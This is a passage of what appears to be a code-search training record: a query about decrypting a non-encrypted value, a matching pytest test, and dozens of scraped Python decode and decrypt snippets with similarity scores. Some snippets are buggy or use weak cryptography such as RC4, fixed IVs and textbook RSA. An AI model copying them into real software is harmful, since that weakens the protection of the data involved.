password):\n\n dec = []\n enc = base64.urlsafe_b64decode(enc).decode()\n for i in enumerate(enc):\n key_c = password[i[0] % len(password)]\n dec_c = chr((256 + ord(i[1]) - ord(key_c)) % 256)\n dec.append(dec_c)\n return \"\".join(dec)", "def decode (self, secret_key, random_seed, message_length=math.inf):\n # seed the random number generator with the seed used to embed\n random.seed(random_seed)\n bytes_visited = {} # a dictionary of the unique bytes already visited\n color_offset = StegImage.color_offset # the color plane where the message exists\n recent_bits = [] # an array. each element is a single bit\n message = \"\"\n message_over = False\n character_offset = 0\n while ((len(bytes_visited) < message_length * self.binary_size) and not message_over) and len(bytes_visited) < (len(self.bytes) - 54)/3: # will try to decode one letter at a time until an error is thrown or it reaches the end of the image. (the algo has no idea when the message stops)\n index_of_byte = None\n while (index_of_byte is None or index_of_byte in bytes_visited): # if the byte is visited twice, in the embed algo, it just skips it the second time and moves on, so do the same when decoding\n index_of_byte = random.randint(self.offset, self.number_of_pixels * 3)\n index_of_byte += color_offset\n bytes_visited[index_of_byte] = True\n byte = self.binary_array[index_of_byte]\n bit = data_manipulation.get_bit_from_byte(byte, self.binary_size - 1) # get the last bit of the byte\n recent_bits.append(bit)\n\n if len(recent_bits) == StegImage.binary_size: # if an entire byte is stored:\n # attempt to decrypt\n try:\n letter = EncryptString.decrypt(recent_bits, secret_key, character_offset = character_offset) # if this throws an error, assume the end of the message has been reached\n # a letter has been successfully decrypted if it reaches this point\n message += letter\n character_offset += 1 # another character in the message has been found\n recent_bits = []\n except:\n # print(\"The end of the message has been reached or the message was not encoded successfully/the wrong decode parameters were given\")\n message_over = True # assume the emssage is over if an error ahs been reached\n #traceback.print_exc() # since an error is expected (a utf-8 decode error), don't print it\n\n return message", "def _decode_data(self, data):\r\n return data.decode('ISO-8859-1')", "def decrypt(self, message):\n #check validity of _private_key\n if self._private_key is None:\n raise Exception(\"invalid private key\")\n\n output = \"\"\n\n d = self._private_key[0]\n n = self._private_key[1]\n\n for i in xrange(len(ciphertext)):\n m = pow(ciphertext[i], d, n)\n output += int_to_string(m)\n return output", "def decryptor(byte_string: bytes, IV: bytes, key: bytes) -> bool:\n decrypted_string = AES_CBC_decrypt(byte_string, IV, key)\n print(len(decrypted_string), decrypted_string)\n if not check_ascii_compliance(decrypted_string):\n raise Exception(decrypted_string)", "def helper_decode(self, tokens: List[str]) -> str:\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n # We iterate over \"char\", which is supposed to be a single\n # character, because the TorchScripted version of the code\n # correctly splits a string into single characters in\n # self.utf8_chars() but the non-TorchScripted version doesn't\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)", "def decrypt(self, key, encrypted):\n output = []\n padded_key = padd_key(key, encrypted)\n for i in range(len(encrypted)):\n dec_ascii = (ord(encrypted[i]) - ord(padded_key[i])) % 256\n output.append(chr(dec_ascii))\n return ''.join(output)", "def extract_ciphertext(self):\n return b64decode(self.cipherblock[\"ciphertext\"])", "def test_encrypt_encoding(self):\n encrypted = encrypt('message')\n\n assert encrypted\n assert encrypted != 'message'\n assert type(encrypted) == str", "def decrypt_message(K, iv, ciphertext, tag):\n aes = Cipher(\"aes-128-gcm\")\n plain = aes.quick_gcm_dec(K, iv, ciphertext, tag)\n \n \n return plain.encode(\"utf8\")", "def decrypt(self, data):\n if not data:\n return ''\n data = self._crypt(data, self.DECRYPT)\n return self._unpad_data(data)", "def test_decode(self):\n for (input, output) in self.tests:\n self.assertEqual(input, output.decode('imap4-utf-7'))", "def decrypt_message(self, env_key, data):\n\n if not env_key or not data:\n raise Exception('Arguments missing.')\n\n key = RSA.importKey(self.private_key)\n try:\n env_key = unquote(env_key).decode('utf8')\n data = unquote(data).decode('utf8')\n except AttributeError:\n # Python 3 compatible\n env_key = unquote(env_key)\n data = unquote(data)\n\n try:\n env_key = base64.b64decode(env_key)\n data = base64.b64decode(data)\n \n cipher = PKCS1_v1_5.new(key)\n\n sentinel = []\n session_key = cipher.decrypt(env_key, sentinel)\n\n rc4_cipher = ARC4.new(session_key)\n\n xml_data = rc4_cipher.decrypt(data)\n\n # TODO: add xml validation\n # schema_root = etree.XML(xml_data)\n # schema = etree.XMLSchema(schema_root)\n # parser = etree.XMLParser(schema=schema)\n\n return xml_data\n except Exception as e:\n if self.developement:\n exception(e)\n\n raise Exception('Could not decrypt message.')", "def decrypt_caesar(ciphertext):\n return ''.join([cipher_to_plain[old] for old in ciphertext.upper()])", "async def decrypt(self, message: Message, jid: Optional[JID], tab: ChatTab):\n\n raise NotImplementedError", "def test_decode():\n enig = Enigma(534, 16, 8, [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0])\n string = \"\"\"-)m>&)IKp[1`Sro$82[@_`TV&`f%}|<]a1R*\\W4IEb6j@+':`R[.(1$vV4rTJ2\n6V?5.;8q r%0p@+[Ir7-?rzIl;nV<4W7,PD[5-?;RE+~vR5-`i}>=z@S \"eJ`8g:S:1ir\nE0=<F0~/;6).\"\"\"\n decoded = \"\"\"Hello, this is a test string. I will follow this with a return\nbringing it onto a new line. I can do this forever, but I won't. Just\nfor a while.\"\"\"\n\n enig.setrotsettings([5, 2, 2, 7, 3, 0, 2, 3, 7, 0, 4, 2, 6, 1, 5, 5])\n assert_equal(decoded, enig.decode(string))\n\n startsettings = [4, 6, 0, 7, 3, 0, 2, 3, 7, 0, 4, 2, 6, 1, 5, 5]\n assert_equal(startsettings, enig.getrotsettings())", "def decrypt(self, input_u8):\n if self.__prev_key == self.__new_key:\n self.__randomize()\n key_map = {b:i for i, b in enumerate(self.cipher)}\n i = 0\n while i < len(input_u8):\n input_u8[i] = key_map[input_u8[i] ^ self.cipher[i%256]]\n i += 1\n return input_u8.decode(\"utf-8\")", "def decode(self, encoded):", "def _decode_encrypted_part(self, value):\n\n return encoding_utils.base64_to_bytes(value)", "def decrypt(self, buffer):\n try:\n ct = base64.b64decode(buffer)\n except:\n print('f a i l')\n return bytes('fail')\n\n cipher = AES.new(self.psk, AES.MODE_GCM, FIXED_IV)\n pt = unpad(cipher.decrypt(ct), AES.block_size)\n return pt", "def decode_kms(ciphertext_blob: str) -> str:\n try:\n import boto3\n except ImportError:\n raise ImportError(\"Missing bot3 package required for KMS.\")\n\n return boto3.client(\"kms\").decrypt(CiphertextBlob=b64decode(ciphertext_blob))[\"Plaintext\"].decode(\"utf-8\")", "def decrypt(key, encoded):\n \n if isinstance(encoded, str):\n encoded = map(ord, encoded)\n key = _key_array(key)\n aes = mxit.aes.AES()\n \n parts = _split(encoded, 16)\n decoded = []\n for part in parts:\n decoded += aes.decrypt(part, key, aes.keySize[\"SIZE_128\"]) \n return _get_text(decoded)", "def decode(b64_msg: str) -> str:\n\n b64_bytes = b64_msg.encode(\"ascii\")\n b64_bytes = base64.b64decode(b64_bytes)\n return b64_bytes.decode(\"ascii\")", "def decipher(self):\n plaintext = \"\"\n for ct, key_char in zip(self.text, self.key):\n char_index = self.char_block.rows[key_char].index(ct)\n plaintext += self.char_block.alphabet[char_index]\n print(plaintext)", "def decrypt(self, ciphertext: str) -> str:\n\n return self.run(ciphertext, Cryptography.DECRYPT)", "def decrypt(self, secret):\n return str.translate(secret, self._decoder)", "def decrypt(text, offset):\n decrypted_text = \"\"\n for char in text:\n if ord(char) <= 64:\n decrypted_character = chr(ord(char))\n elif ord(char) <= 90:\n decrypted_character = ord(char) - offset\n if decrypted_character < 65:\n decrypted_character += 26\n decrypted_character = chr(decrypted_character)\n else:\n decrypted_character = ord(char) - offset\n if decrypted_character < 97:\n decrypted_character += 26\n decrypted_character = chr(decrypted_character)\n decrypted_text += decrypted_character\n\n return decrypted_text", "def decrypt(s):\n if s is None:\n return None\n else:\n # try:\n enc_value = ast.literal_eval(s)\n private_key = serialization.load_pem_private_key(\n pkey.encode('utf-8'),\n password=None,\n backend=default_backend()\n )\n\n dec = private_key.decrypt(\n enc_value,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n return dec.decode()", "def decode_bytes(data: bytearray) -> str:\n pattern = re.compile('\\r', re.UNICODE)\n res = data.decode('utf-8', 'ignore')\n res = pattern.sub('', res)\n return res", "def decrypt(self, ciphertext):\n text = []\n # ciphertext = ciphertext.upper()\n for char in ciphertext:\n try:\n key = math_utils.mult_mod_inv(self.a, len(self.characters)) * (self.characters.index(char) - self.b) % len(self.characters)\n # If character is not in set for cipher,\n # directly append it without transformation\n except ValueError:\n text.append(char)\n else:\n text.append(self.characters[key])\n return ''.join(text)", "def Decrypt(self, input_bytes):\n ciph_bytes = input_bytes[keyczar.HEADER_SIZE:]\n decrypted = self.key.decrypt(ciph_bytes)\n return self.__Decode(decrypted)", "def decrypt(\r\n key: bytes,\r\n cipher_text: bytes,\r\n) -> str:\r\n block_size = 16\r\n iv = cipher_text[:block_size]\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n plain_text = cipher.decrypt(cipher_text[block_size:]).decode('utf-8')\r\n return _unpad(plain_text)", "def decrypt(self, ciphertext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def decode_data ( data ) :\n cipher = get_cipher( data )\n index = 0\n firstpass = []\n datalen = len( data )\n while index < datalen :\n if index % 2 == 0 :\n firstpass.append( chr( ord( data[ index ] ) - cipher ) )\n else :\n firstpass.append( chr( ord( data[ index ] ) + cipher ) )\n index += 1\n\n firstpass[ 0 ] = data[ 0 ]\n firstpass[ -1 ] = data[ -1 ]\n firstpass[ -2 ] = data[ -2 ]\n decoded_data = ''.join( firstpass )\n return base64.b64decode( decoded_data )" ]
[ "0.7515797", "0.72070503", "0.7080225", "0.70087695", "0.68919706", "0.6883082", "0.6702499", "0.6700832", "0.6643625", "0.6547494", "0.65426725", "0.65246123", "0.65195185", "0.6513772", "0.6512258", "0.6473068", "0.645004", "0.644082", "0.6412383", "0.63955086", "0.6384664", "0.63554555", "0.6319811", "0.63076264", "0.63009685", "0.6298364", "0.62982076", "0.62950504", "0.62659585", "0.6216549", "0.62075603", "0.6204017", "0.6204017", "0.619547", "0.6195197", "0.61891216", "0.6153994", "0.6153994", "0.61403716", "0.61374086", "0.6135529", "0.6129432", "0.6101927", "0.60892904", "0.60845447", "0.6083324", "0.608028", "0.608028", "0.60746217", "0.6059485", "0.60513467", "0.6048026", "0.60402584", "0.60264623", "0.60148644", "0.60130936", "0.6011288", "0.60023165", "0.5999862", "0.59813946", "0.5969326", "0.59672475", "0.5958602", "0.5949737", "0.5948432", "0.5947733", "0.59376884", "0.59312946", "0.59253365", "0.5925112", "0.591778", "0.5916524", "0.5914874", "0.5910519", "0.5903772", "0.5896354", "0.58923435", "0.58869636", "0.5885336", "0.58850175", "0.5868816", "0.58678573", "0.5865796", "0.58655995", "0.58498514", "0.58484256", "0.5846585", "0.5846539", "0.5845014", "0.58350104", "0.58066446", "0.5789011", "0.57879627", "0.5786208", "0.57860845", "0.5782853", "0.5779817", "0.5776681", "0.57737494", "0.57665503" ]
0.70483595
3
It raises an error when trying to decrypt a nonencrypted value.
def test_decrypt_format(self): with pytest.raises(EncryptionError): decrypt('message')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_decrypt_key_invalid(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=b'0' * 31)", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def test_incorrect_decrypt_message(cipher):\n with pytest.raises(AssertionError):\n decrypted = cipher.decrypt('U6DQfhE17od2Qe4TPZFJHn3LOMkpPDqip77e4b5uv7s=')\n assert decrypted == 'Wrong string'", "def _decrypt(self, value, **options):\n\n raise CoreNotImplementedError()", "def test_decrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = b'0' * 32\n\n encrypted = encrypt('message')\n assert decrypt(encrypted) == 'message'\n\n settings.CHITON_ENCRYPTION_KEY = b'1' * 32\n with pytest.raises(EncryptionError):\n decrypt(encrypted)", "def test_decryption_private_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.decrypt_data(given))", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def test_decrypt_encrypted(self):\n encrypted = encrypt('message')\n decrypted = decrypt(encrypted)\n\n assert decrypted == 'message'", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def decrypt(self, data):", "def decrypt(self, value):\n return self._execute(value, task='decrypt')", "def decrypt_message(encrypted_message):", "def _disabled_decrypt(self, *args, **kwargs):\n raise NotImplementedError('\"decrypt\" is not supported by the \"{}\" algorithm'.format(self.java_name))", "def Decrypt(self, data):\n\n data = base64.b64decode(data)\n es = AES.new(self.creds.aesKey, AES.MODE_CBC, self.creds.aesIV)\n solved = \"\"\n try:\n solved = es.decrypt(data)\n except ValueError:\n stdout.write(\"Error, corrupted file.\\n\\n\")\n return \"%errorpass:1234123412341234%\"\n\n return solved", "def decrypt(self, encrypted_token: bytes) -> bytes:\n return None", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def test_decrypt_encoding(self):\n encrypted = encrypt('méssåge')\n decrypted = decrypt(encrypted)\n\n assert decrypted == 'méssåge'", "def test_real_world_malware(self):\n key = bytes.fromhex('0394d550fb286dda')\n data = bytes.fromhex('6bdb2c294e7e031c38e4adecaa8dc755')\n unit = self.load(key, raw=True)\n self.assertEqual(unit.decrypt(data).hex(), '4c5a495001b30026968e700017f7ec05')", "def test_kms_decrypt_fails_without_b64_secret(self):\n with self.assertRaises(SystemExit):\n ef_utils.kms_decrypt(self.mock_kms, self.secret)", "def test_decoding_non_str_fails(self):\n self.assertRaises(DecodingError, base62.to_decimal, sys.maxsize)", "def decrypt(self, key, value):\n key = hashlib.sha256(key).digest()[:self.BLOCK_SIZE]\n iv = value[:16]\n crypted = value[16:]\n cipher = AES.new(key,AES.MODE_CBC,iv)\n return self.pkcs5_unpad(cipher.decrypt(crypted))", "def decryptor(byte_string: bytes, IV: bytes, key: bytes) -> bool:\n decrypted_string = AES_CBC_decrypt(byte_string, IV, key)\n print(len(decrypted_string), decrypted_string)\n if not check_ascii_compliance(decrypted_string):\n raise Exception(decrypted_string)", "def testKeyMismatch(self):\n encrypted_data = self.encrypt_wrapper.read(1024 * 1024 * 100)\n\n wrong_key = crypto.RSAPrivateKey().GenerateKey()\n decrypt_wrapper = uploads.DecryptStream(\n readers_private_key=self.readers_private_key,\n writers_public_key=wrong_key.GetPublicKey(),\n outfd=self.outfd)\n\n # We should know after very few bytes that the key is wrong. The\n # first encrypted chunk is the serialized signature which is 518\n # bytes in the test. Adding crypto headers gives a chunk size of\n # 570. After 600 bytes we should definitely bail out.\n with self.assertRaises(crypto.VerificationError):\n decrypt_wrapper.write(encrypted_data[:600])", "def decrypt(encryption_value):\n Common.logger.info(\"Decryption job started started\")\n key = Common.get_config_value(\"jenkins_key\")\n fkey = Fernet(key.encode())\n decrypt_value = fkey.decrypt(encryption_value.encode())\n return decrypt_value", "def decrypt_data(self, encrypted_data):\n raise NotImplementedError", "def decrypt(crypto, priv):\r\n string = rsa.encrypt(crypto, priv)\r\n string = livingDead.utfE(crypto)\r\n return crypto", "def heat_decrypt(value, encryption_key=None):\n encryption_key = get_valid_encryption_key(encryption_key)\n auth = base64.b64decode(value)\n iv = auth[:AES.block_size]\n cipher = AES.new(encryption_key, AES.MODE_CFB, iv)\n res = cipher.decrypt(auth[AES.block_size:])\n return res", "def decrypt(cipherBackup: str, password: str) -> str:\n\n try:\n return comp.desencriptar(cipherBackup, password)\n\n except:\n return '1'", "def decrypt(self, full_encrypted_value, **options):\n\n try:\n self._validate_format(full_encrypted_value, **options)\n encrypted_part = self._get_encrypted_part(self._prepare_input(full_encrypted_value),\n **options)\n\n return self._decrypt(encrypted_part, **options)\n except Exception as error:\n raise DecryptionError(error) from error", "def test_sealedbox_enc_dec(self):\n # Encrypt with pk\n encrypted_data = nacl.sealedbox_encrypt(data=self.unencrypted_data, pk=self.pk)\n\n # Decrypt with sk\n decrypted_data = nacl.sealedbox_decrypt(data=encrypted_data, sk=self.sk)\n\n self.assertEqual(self.unencrypted_data, decrypted_data)", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def test_secretbox_enc_dec(self):\n # Encrypt with sk\n encrypted_data = nacl.secretbox_encrypt(data=self.unencrypted_data, sk=self.sk)\n\n # Decrypt with sk\n decrypted_data = nacl.secretbox_decrypt(data=encrypted_data, sk=self.sk)\n\n self.assertEqual(self.unencrypted_data, decrypted_data)", "def test_encryption_with_data_to_decrypt_as_str(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n encryptor.set_private_key(self.pem_private_key)\n encryptor.set_public_key(self.pem_public_key)\n\n actual = encryptor.encrypt_data(given)\n\n self.assertNotEqual(given, actual)\n\n self.assertRaises(ValueError, lambda: encryptor.decrypt_data(actual.hex()))", "def Decrypt(key, value):\n key = key.zfill(32)[:32]\n aes = AES.new(key, AES.MODE_ECB)\n encrypted = base64.b64decode(value)\n decrypted = aes.decrypt(encrypted)\n return RemovePadding(decrypted)", "def provider_decrypt(self, uid):\n return self.context.get(\"/ckks/provider/decrypt/%s\" % uid, None,\n \"CKKS:: failed decrypting data for uid: %s\" % uid\n )", "def _decrypt(self, key, value):\n payload = EncryptedPayload.from_json(value)\n if not payload:\n return value\n\n decrypted = self._kms_crypto.decrypt_payload(payload)\n if not decrypted:\n return value\n\n key_prefix = '%s=' % key\n if not decrypted.startswith(key_prefix):\n return value\n\n return decrypted[len(key_prefix):]", "def decrypt(key, cipher, plaintext):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n c = cipher.read()\n p = rsa.decrypt(c, k)\n\n plaintext.write(p)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except DecryptError:\n click.echo(\"ERROR: Key is wrong or message was badly padded before encryption\")", "def decrypt_string(self, value) -> str:\n\n supported_decrypter = self.find_supported_decrypter(value)\n if not (supported_decrypter):\n return value\n\n decrypted_string = supported_decrypter.decrypt_secret_from_aws(value)\n\n # Check if the payload is serialized JSON\n try:\n result = json.loads(decrypted_string)\n except json.decoder.JSONDecodeError:\n result = decrypted_string\n return result", "def test_decryption(d, c):\n\n#\td = int(raw_input(\"\\nEnter d from public key\\n\"))\n#\tc = int(raw_input(\"\\nEnter c from public key\\n\"))\n\n x = int(raw_input(\"\\nEnter number to decrypt\\n\"))\n decode(endecrypt(x, d, c))", "def decrypt(data, key):\n data = six.ensure_binary(data)\n try:\n data = privy.peek(hidden=data, password=key)\n except ValueError:\n error = \"Unable to decrypt {cnt} bytes of data using key {k}, invalid key!\"\n error = error.format(cnt=len(data), k=key)\n raise exceptions.ModuleError(error)\n return six.ensure_text(data)", "def decrypt(self, encrypted: str) -> str: # type: ignore\n passphrase = self.passphrase\n encrypted = base64.b64decode(encrypted) # type: ignore\n assert encrypted[0:8] == b\"Salted__\"\n salt = encrypted[8:16]\n key_iv = self.bytes_to_key(passphrase.encode(), salt, 32 + 16)\n key = key_iv[:32]\n iv = key_iv[32:]\n aes = AES.new(key, AES.MODE_CBC, iv)\n try:\n return self.unpad(aes.decrypt(encrypted[16:])).decode() # type: ignore\n except UnicodeDecodeError:\n raise ValueError(\"Wrong passphrase\")", "def decode(self, crypto):", "def _decrypt(data):\n cipher = AES.new(bytes(_AES_KEY), AES.MODE_CBC, bytes(_AES_IV))\n return cipher.decrypt(data)", "def test_enc_dec(self):\n # Encrypt with pk\n encrypted_data = nacl.enc(data=self.unencrypted_data, pk=self.pk)\n\n # Decrypt with sk\n decrypted_data = nacl.dec(data=encrypted_data, sk=self.sk)\n self.assertEqual(self.unencrypted_data, decrypted_data)", "def test_py2_transaction_exception_message_bytes_english():\n try:\n raise ValueError(BYTES_ENGLISH)\n except ValueError:\n notice_error()", "def decrypt(self, msg):\n if self.security_type is not None and self.security_type != 0:\n res, used, _ = gss.unwrap(self.ctx, msg)\n isconf = self.security_type == gss.RequirementFlag.confidentiality\n if (not used and isconf):\n raise GSSClientError('User requested encryption, '\n 'but the server sent an unencrypted '\n 'message!')\n return res.decode('utf-8')\n else:\n return msg.decode('utf-8')", "def decrypt_string(self, encrypted_string):\n return self.fernet_instance.decrypt(encrypted_string.encode('utf-8')).decode('utf-8')", "def _decrypt_encrypted_data(encryption_algorithm_info, encrypted_content, password):\n\n decrypt_func = crypto_funcs[encryption_algorithm_info.encryption_cipher]\n\n # Modern, PKCS#5 PBES2-based encryption\n if encryption_algorithm_info.kdf == 'pbkdf2':\n\n if encryption_algorithm_info.encryption_cipher == 'rc5':\n raise ValueError(pretty_message(\n '''\n PBES2 encryption scheme utilizing RC5 encryption is not supported\n '''\n ))\n\n enc_key = pbkdf2(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length\n )\n enc_iv = encryption_algorithm_info.encryption_iv\n\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n elif encryption_algorithm_info.kdf == 'pbkdf1':\n derived_output = pbkdf1(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length + 8\n )\n enc_key = derived_output[0:8]\n enc_iv = derived_output[8:16]\n\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n elif encryption_algorithm_info.kdf == 'pkcs12_kdf':\n enc_key = pkcs12_kdf(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length,\n 1 # ID 1 is for generating a key\n )\n\n # Since RC4 is a stream cipher, we don't use an IV\n if encryption_algorithm_info.encryption_cipher == 'rc4':\n plaintext = decrypt_func(enc_key, encrypted_content)\n\n else:\n enc_iv = pkcs12_kdf(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.encryption_block_size,\n 2 # ID 2 is for generating an IV\n )\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n return plaintext", "def decrypt(s):\n if s is None:\n return None\n else:\n # try:\n enc_value = ast.literal_eval(s)\n private_key = serialization.load_pem_private_key(\n pkey.encode('utf-8'),\n password=None,\n backend=default_backend()\n )\n\n dec = private_key.decrypt(\n enc_value,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n return dec.decode()", "def decrypt(self, ciphertext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def doDecode(self):\n raise CipherError(\"override this funct and return the decoded msg\")", "def decrypt(self, password):\r\n\r\n key = self.config.get_string(\"gox\", \"secret_key\")\r\n sec = self.config.get_string(\"gox\", \"secret_secret\")\r\n if sec == \"\" or key == \"\":\r\n return self.S_NO_SECRET\r\n\r\n # pylint: disable=E1101\r\n hashed_pass = hashlib.sha512(password.encode(\"utf-8\")).digest()\r\n crypt_key = hashed_pass[:32]\r\n crypt_ini = hashed_pass[-16:]\r\n aes = AES.new(crypt_key, AES.MODE_OFB, crypt_ini)\r\n try:\r\n encrypted_secret = base64.b64decode(sec.strip().encode(\"ascii\"))\r\n self.secret = aes.decrypt(encrypted_secret).strip()\r\n self.key = key.strip()\r\n except ValueError:\r\n return self.S_FAIL\r\n\r\n # now test if we now have something plausible\r\n try:\r\n print(\"testing secret...\")\r\n # is it plain ascii? (if not this will raise exception)\r\n dummy = self.secret.decode(\"ascii\")\r\n # can it be decoded? correct size afterwards?\r\n if len(base64.b64decode(self.secret)) != 64:\r\n raise Exception(\"decrypted secret has wrong size\")\r\n\r\n print(\"testing key...\")\r\n # key must be only hex digits and have the right size\r\n hex_key = self.key.replace(\"-\", \"\").encode(\"ascii\")\r\n if len(binascii.unhexlify(hex_key)) != 16:\r\n raise Exception(\"key has wrong size\")\r\n\r\n print(\"ok :-)\")\r\n return self.S_OK\r\n\r\n except Exception as exc:\r\n # this key and secret do not work :-(\r\n self.secret = \"\"\r\n self.key = \"\"\r\n print(\"### Error occurred while testing the decrypted secret:\")\r\n print(\" '%s'\" % exc)\r\n print(\" This does not seem to be a valid MtGox API secret\")\r\n return self.S_FAIL", "def decrypt(code):\n f = Fernet(settings.SECRET_KEY)\n return f.decrypt(code).decode('ascii')", "def test_kms_decrypt_fails_client_error(self):\n self.mock_kms.decrypt.side_effect = self.client_error\n with self.assertRaises(SystemExit):\n ef_utils.kms_decrypt(self.mock_kms, self.secret)", "def raw_decrypt(self, ciphertext):\n if not isinstance(ciphertext, int) and not isinstance(ciphertext, type(mpz(1))) and not isinstance(scalar, numpy.int64):\n raise TypeError('Expected ciphertext to be an int, not: %s' %\n type(ciphertext))\n\n decrypt_to_p = self.l_function(powmod(ciphertext, self.p-1, self.psquare), self.p) * self.hp % self.p\n decrypt_to_q = self.l_function(powmod(ciphertext, self.q-1, self.qsquare), self.q) * self.hq % self.q\n value = self.crt(decrypt_to_p, decrypt_to_q)\n if value < self.n/3:\n return value\n else:\n return value - self.n", "def decrypt_message(encrypted_message):\r\n\r\n # conversion to bytes\r\n encrypted_message = bytes(encrypted_message, \"ascii\")\r\n\r\n # loading key\r\n key = load_key()\r\n\r\n # creating a fernet object\r\n f = Fernet(key)\r\n\r\n # decrypting the messsage\r\n decrypted_message = f.decrypt(encrypted_message)\r\n\r\n return decrypted_message.decode()", "def Decrypt(self, ciphertext):\n if not isinstance(ciphertext, int) and not isinstance(ciphertext, long):\n raise ValueError('Expected int or long type ciphertext but got: %s' %\n type(ciphertext))\n u = ModExp(ciphertext, self.__lambda, self.nsquare)\n l_of_u = (u - 1) // self.n\n return (l_of_u * self.__mu) % self.n", "def decrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.decrypt(message)", "def _decode_encrypted_part(self, value):\n\n return encoding_utils.base64_to_bytes(value)", "def test_fail():\n enig = Enigma()\n str1 = \"Hellow\"\n str2 = \"Potato\"\n en1 = enig.encode(str1)\n en2 = enig.encode(str2)\n de1 = enig.decode(en1)\n de2 = enig.decode(en2)\n\n assert_not_equal(str1, de1)\n assert_not_equal(str2, de2)", "def decrypt(self, input, iv) :\n pass", "def decrypt(text,key):\r\n aes = pyaes.AESModeOfOperationCTR(key)\r\n decrypted = aes.decrypt(text)\r\n return decrypted", "def test_plaintext_and_anoncrypt_raises_error(alice):\n with pytest.raises(ValueError):\n alice.pack({\"test\": \"test\"}, plaintext=True, anoncrypt=True)", "def decrypt(ciphertext: str, key: str) -> str:\n return encrypt(ciphertext, key)", "def AES_decrypt(ciphertext: bytes) -> Text:\n text = b64decode(ciphertext)\n cipher = AES.new(secret_key, mode, IV)\n return Padding.unpad(cipher.decrypt(text), bs).decode('utf-8')", "def decrypt_pk(priv_key, ciphertext):\n try:\n plaintext = priv_key.decrypt(\n b64decode(ciphertext),\n padding.OAEP(\n mgf=padding.MGF1(algorithm=CryptoHash()),\n algorithm=CryptoHash(),\n label=None\n )\n )\n except UnsupportedAlgorithm as e:\n # a failure to dencrypt someone else's data is not typically a fatal\n # error, but in this particular case, the most likely cause of this\n # error is an old cryptography library\n logging.error(\"Fatal error: encryption hash {} unsupported, try upgrading to cryptography >= 1.4. Exception: {}\".format(\n CryptoHash, e))\n # re-raise the exception for the caller to handle\n raise e\n return plaintext", "def test_kms_re_encrypt_fails_without_b64_secret(self):\n with self.assertRaises(SystemExit):\n ef_utils.kms_re_encrypt(self.mock_kms, self.service, self.env, self.secret)", "def decrypt(value, profile=DEFAULT_PROFILE, store=DEFAULT_STORE,\n passphrase=None, key=None):\n key = key or _create_dec_key(profile, store, passphrase=passphrase)\n if key:\n return _decrypt_value(key, value)\n else:\n # No decryption support\n return value", "def test_py2_transaction_exception_message_bytes_non_english():\n try:\n raise ValueError(BYTES_UTF8_ENCODED)\n except ValueError:\n notice_error()", "def test_encryption_public_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.encrypt_data(given))", "def decrypt(self, cipherText, additionalData=''):\n # warning only valid in the random oracle\n mac_key = sha2(b'Poor Mans Key Extractor'+self._key).digest()\n mac = MessageAuthenticator(mac_key)\n if not mac.verify(cipherText, additionalData=additionalData):\n raise ValueError(\"Invalid mac. Your data was tampered with or your key is wrong\")\n else:\n return super(AuthenticatedCryptoAbstraction, self).decrypt(cipherText['msg'])", "def test_endecrypt():\n\n e, d, c = keygen()\n\n 